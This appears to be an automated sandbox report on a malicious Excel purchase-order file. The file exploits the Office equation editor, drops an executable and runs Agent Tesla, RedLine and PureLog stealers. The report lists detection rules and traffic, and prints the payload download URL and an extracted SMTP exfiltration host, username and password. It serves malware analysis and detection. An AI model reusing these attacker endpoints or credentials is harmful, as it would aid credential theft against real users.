Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 2_5_24.xlam.xlsx

Overview

General Information

Sample name:PO 2_5_24.xlam.xlsx
Analysis ID:1435421
MD5:989feda4871b86bfbcec9debb0b2ec45
SHA1:05ef3f9b7d77b9709423222a81d670cbcae013cd
SHA256:26fcc106f92623f06b5eb2e87b2e2e58a2ad9eea51de7d15a15b85dafe44b937
Tags:AgentTeslaxlamxlsx
Infos:

Detection

AgentTesla, PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1740 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 2064 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • CKK.exe (PID: 2544 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: 6DBF70053A37B13C106C623E0934DDFF)
        • RegSvcs.exe (PID: 1128 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.kino2.top", "Username": "serverizu09@kino2.top", "Password": "     XY%R[udi4U]=    "}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x24c3:$s1: <legacyDrawing r:id="
  • 0x24eb:$s2: <oleObject progId="
  • 0x2540:$s3: autoLoad="true"

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
        • 0x3f5d7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
        • 0x3f649:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
        • 0x3f6d3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
        • 0x3f765:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        • 0x3f7cf:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
        • 0x3f841:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
        • 0x3f8d7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
        • 0x3f967:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
        00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.RegSvcs.exe.450ee8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.RegSvcs.exe.450ee8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.RegSvcs.exe.450ee8.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                4.2.RegSvcs.exe.450ee8.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x3d7d7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3d849:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3d8d3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x3d965:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x3d9cf:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3da41:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x3dad7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x3db67:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                4.2.RegSvcs.exe.450000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 57 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.94.54.101, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2064, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2064, TargetFilename: C:\Users\user\AppData\Roaming\CKK.exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2064, Protocol: tcp, SourceIp: 23.94.54.101, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CKK.exe, NewProcessName: C:\Users\user\AppData\Roaming\CKK.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CKK.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2064, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 2544, ProcessName: CKK.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CKK.exe, NewProcessName: C:\Users\user\AppData\Roaming\CKK.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CKK.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2064, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 2544, ProcessName: CKK.exe
                  Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: api.ipify.org

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: PO 2_5_24.xlam.xlsxAvira: detected
                  Found malware configuration
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.kino2.top", "Username": "serverizu09@kino2.top", "Password": " XY%R[udi4U]= "}
                  Multi AV Scanner detection for domain / URL
                  Source: http://23.94.54.101/ISW.exeVirustotal: Detection: 6%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\CKK.exeReversingLabs: Detection: 39%
                  Source: C:\Users\user\AppData\Roaming\CKK.exeVirustotal: Detection: 40%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: PO 2_5_24.xlam.xlsxVirustotal: Detection: 53%Perma Link
                  Source: PO 2_5_24.xlam.xlsxReversingLabs: Detection: 63%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\CKK.exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.94.54.101 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49162 version: TLS 1.2
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: CKK.exe, 00000003.00000003.446352254.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, CKK.exe, 00000003.00000003.446225699.0000000002D70000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_00EADBBE
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E7C2A2 FindFirstFileExW,3_2_00E7C2A2
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB68EE FindFirstFileW,FindClose,3_2_00EB68EE
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_00EB698F
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00EAD076
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00EAD3A9
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00EB9642
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00EB979D
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00EB9B2B
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB5C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00EB5C97

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Shellcode detected
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590378 CreateFileW,2_2_03590378
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590477 WriteFile,2_2_03590477
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0359040F WriteFile,2_2_0359040F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590502 WriteFile,CreateProcessW,ExitProcess,2_2_03590502
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035903AF LoadLibraryW,2_2_035903AF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035905A1 CreateProcessW,ExitProcess,2_2_035905A1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590259 CreateFileW,2_2_03590259
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0359045B WriteFile,2_2_0359045B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900DA CreateFileW,2_2_035900DA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035905DD ExitProcess,2_2_035905DD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900DD CreateFileW,2_2_035900DD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035902D0 ExitProcess,CreateFileW,2_2_035902D0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900D4 CreateFileW,2_2_035900D4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900D6 CreateFileW,2_2_035900D6
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035904C4 WriteFile,CreateProcessW,ExitProcess,2_2_035904C4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0359007B CreateFileW,2_2_0359007B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900FA CreateFileW,2_2_035900FA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0359007F CreateFileW,2_2_0359007F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590071 CreateFileW,2_2_03590071
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590075 CreateFileW,2_2_03590075
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035902E9 CreateFileW,2_2_035902E9
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035904E8 WriteFile,CreateProcessW,ExitProcess,2_2_035904E8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900EB CreateFileW,2_2_035900EB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590563 CreateProcessW,ExitProcess,2_2_03590563
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590365 CreateFileW,2_2_03590365
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590098 CreateFileW,2_2_03590098
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0359009F CreateFileW,2_2_0359009F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590113 CreateFileW,2_2_03590113
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590092 CreateFileW,2_2_03590092
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590094 CreateFileW,2_2_03590094
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590089 CreateFileW,2_2_03590089
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0359008E CreateFileW,2_2_0359008E
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590101 CreateFileW,2_2_03590101
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590580 CreateProcessW,ExitProcess,2_2_03590580
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590305 CreateFileW,2_2_03590305
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590107 CreateFileW,2_2_03590107
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900B2 CreateFileW,2_2_035900B2
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900B4 CreateFileW,2_2_035900B4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900B6 CreateFileW,2_2_035900B6
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590136 CreateFileW,2_2_03590136
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035904A8 WriteFile,2_2_035904A8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900AB CreateFileW,2_2_035900AB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0359032C CreateFileW,2_2_0359032C
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900AE CreateFileW,2_2_035900AE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035900A1 CreateFileW,2_2_035900A1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03590123 CreateFileW,2_2_03590123
                  Source: global trafficDNS query: name: api.ipify.org
                  Source: global trafficDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
